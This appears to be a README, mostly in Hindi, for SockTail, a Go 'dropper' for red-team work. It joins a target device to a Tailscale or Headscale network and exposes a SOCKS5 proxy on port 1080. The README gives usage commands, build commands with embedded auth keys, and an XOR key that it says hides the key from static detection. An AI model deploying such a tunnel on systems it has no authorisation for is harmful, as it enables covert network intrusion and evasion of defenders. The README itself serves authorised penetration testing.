
हल्का Go बाइनरी जो किसी डिवाइस को Tailscale नेटवर्क से जोड़ता है और अस्थायी रेड टीम एक्सेस के लिए एक लोकल SOCKS5 प्रॉक्सी को एक्सपोज़ करता है। XOR-ऑबफस्केटेड ऑथ की, कस्टम कंट्रोल सर्वर, और शून्य पर्सिस्टेंस का समर्थन करता है।
SockTail एक छोटा बाइनरी है जो एक डिवाइस को Tailscale नेटवर्क से जोड़ता है और पोर्ट 1080 पर एक स्थानीय SOCKS5 प्रॉक्सी को एक्सपोज़ करता है। यह रेड टीम ऑपरेशन के लिए है जहाँ आपको लक्ष्य सिस्टम में नेटवर्क एक्सेस की आवश्यकता होती है, बिना अजीब पोर्ट फ़ॉरवर्ड, स्थायी डेमन, या शोर करने वाले टनल सेट किए।
1080 पर SOCKS5 प्रॉक्सीtsnet के माध्यम से Tailscale में शामिल होता है, कोई बाहरी निर्भरता नहींयह स्थायित्व के लिए नहीं है। यह रेड टीम ऑप्स के लिए एक-शॉट SOCKS ड्रॉपर है।
छवि श्रेय: "The SOCKS We Have at Home" by TrustedSec — मीम्स के लिए धन्यवाद।
Usage: ./SockTail [hostname] [authkey] [control-url]
hostname: Optional. Auto-generated if not specified
authkey: Optional. Uses embedded key if not specified
control-url: Optional. Uses Tailscale default or build-time URL if not specified
port: Fixed at 1080
Examples:
./SockTail
- Auto hostname, embedded key, default control server
./SockTail vpn-srv-01
- Custom hostname, embedded key, default control server
./SockTail shellbox-7 tskey-auth-1fXXXXXXXXXXXXXXXXXXXXXXXXXX
- Custom hostname and runtime auth key, default control server
./SockTail my-proxy tskey-auth-1fXXXXXXXXXXXXXXXXXXXXXXXXXX https://headscale.example.com
- All custom: hostname, auth key, and control server (e.g., Headscale)
tsnet.Server बनाता है।localhost:1080 पर सुनना शुरू करता है।tsnet.Dial का उपयोग करके अग्रेषित किए जाते हैं।कोई स्थायित्व नहीं है। एक बार बाइनरी बाहर निकलने पर, आपके Tailnet से कनेक्शन ड्रॉप हो जाता है।
प्रोजेक्ट में AuthKey के लिए XOR-आधारित अस्पष्टीकरण शामिल है ताकि स्टैटिक डिटेक्शन से बचा जा सके। आप कंपाइलर फ्लैग का उपयोग करके बिल्ड टाइम पर अपनी auth कुंजी एम्बेड कर सकते हैं - कोई मैन्युअल संपादन आवश्यक नहीं!
var xorKey = []byte("747sg^8N0$")
यदि कमांड लाइन पर कोई कुंजी पास नहीं की जाती है तो कुंजी बिल्ड प्रक्रिया के दौरान स्वचालित रूप से XOR-अस्पष्ट और एम्बेड हो जाएगी।
Go में लिखा गया, कोई बाहरी निर्भरता नहीं:
# Build with embedded fallback key
make build
# Build with your custom auth key (recommended)
make build-with-key AUTH_KEY=tskey-auth-client-xxxxx-your-key
# Build with custom auth key and control server (for Headscale, etc.)
make build-with-config AUTH_KEY=tskey-auth-client-xxxxx-your-key CONTROL_URL=https://headscale.example.com
# Build for all platforms with your key
make build-all-with-key AUTH_KEY=tskey-auth-client-xxxxx-your-key
# Build for all platforms with custom control server
make build-all-with-config AUTH_KEY=tskey-auth-client-xxxxx-your-key CONTROL_URL=https://headscale.example.com
बिल्ड सिस्टम स्वचालित रूप से आपकी auth कुंजी को XOR-अस्पष्ट करता है और संकलन समय पर कुंजी और नियंत्रण URL दोनों को एम्बेड करता है - कोई मैन्युअल स्रोत संपादन आवश्यक नहीं!
कस्टम कंट्रोल सर्वर: Headscale जैसे स्व-होस्टेड Tailscale समाधानों के लिए एकदम सही। बस अपने कंट्रोल सर्वर URL और उस इंस्टेंस के लिए उपयुक्त auth कुंजी निर्दिष्ट करें।